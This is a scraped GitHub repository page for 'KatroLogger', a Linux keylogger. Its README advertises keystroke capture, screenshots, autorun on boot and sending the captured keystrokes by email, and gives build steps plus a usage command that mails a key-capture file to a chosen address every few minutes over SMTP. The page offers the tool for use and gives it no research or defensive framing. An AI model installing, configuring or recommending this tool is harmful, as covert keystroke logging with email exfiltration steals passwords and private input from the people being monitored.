Skip to content

Katrovisch/KatroLogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation


KeyLogger for Linux Systems

Features

  • Runs on GUI systems or CLI
  • Sending data by email
  • Autorun on boot
  • Screenshots

Dependencies

Install libquickmail:

wget https://ufpr.dl.sourceforge.net/project/libquickmail/libquickmail-0.1.29.tar.xz
tar -xvf libquickmail-0.1.29.tar.xz
./autogen.sh && ./configure && make && make install

Install

./configure && make && make install

Usage

katrologger --output /path/file

Send data by e-mail

Argument Description
--smtp-status email sending status
--smtp-url SMTP server
--smtps-url SMTPS server
--port SMTP port
--mail-from source email
--pass password email
--mail-rcpt receipt email
--smtp-file attach key capture file for sending
--update update interval for sending email, 1-60 (minutes)
--screen screenshots (:0 is display default)
katrologger --smtps-url smtp.gmail.com --port 465 --mail-from <address> --mail-rcpt <address> --pass <password> --smtp-file /path/keyscan --time 10

Uninstall

make uninstall

License

KatroLogger is licensed under the GNU General Public License v3.0

About

KeyLogger for Linux Systems

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published